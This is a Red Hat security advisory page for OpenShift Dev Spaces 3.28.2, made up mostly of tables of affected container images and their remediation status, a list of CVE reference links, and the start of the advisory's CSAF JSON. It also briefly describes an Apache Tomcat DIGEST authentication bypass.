| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64 | — |
Workaround
|
A flaw was found in Apache Tomcat. When DIGEST authentication was configured, any user not known to the configured Realm would be authenticated if they presented the password "null". This allows a remote attacker to bypass security controls.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64 | — |
Workaround
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:25123 | self |
| https://access.redhat.com/documentation/en-us/red… | external |
| https://access.redhat.com/security/cve/CVE-2026-42578 | external |
| https://access.redhat.com/security/cve/CVE-2026-42579 | external |
| https://access.redhat.com/security/cve/CVE-2026-42581 | external |
| https://access.redhat.com/security/cve/CVE-2026-42584 | external |
| https://access.redhat.com/security/cve/CVE-2026-42587 | external |
| https://access.redhat.com/security/cve/CVE-2026-43512 | external |
| https://access.redhat.com/security/cve/CVE-2026-6321 | external |
| https://access.redhat.com/security/updates/classi… | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2026-6321 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2466582 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-6321 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-6321 | external |
| https://cna.openjsf.org/security-advisories.html | external |
| https://github.com/fastify/fast-uri/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-42578 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477226 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42578 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42578 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42579 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477217 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42579 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42579 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42581 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477232 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42581 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42581 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42584 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477224 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42584 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42584 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42587 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477220 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42587 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42587 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-43512 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2476511 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-43512 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-43512 | external |
| https://lists.apache.org/thread/7x09x7o12solvclsl… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Dev Spaces 3.28.2 has been released.",
"title": "Topic"
},
{
"category": "general",
"text": "This release provides security fixes for Dev Spaces components. \nhttps://access.redhat.com/support/policy/updates/openshift#crw",
"title": "Details"
},
{
"category": "legal_disclaimer",
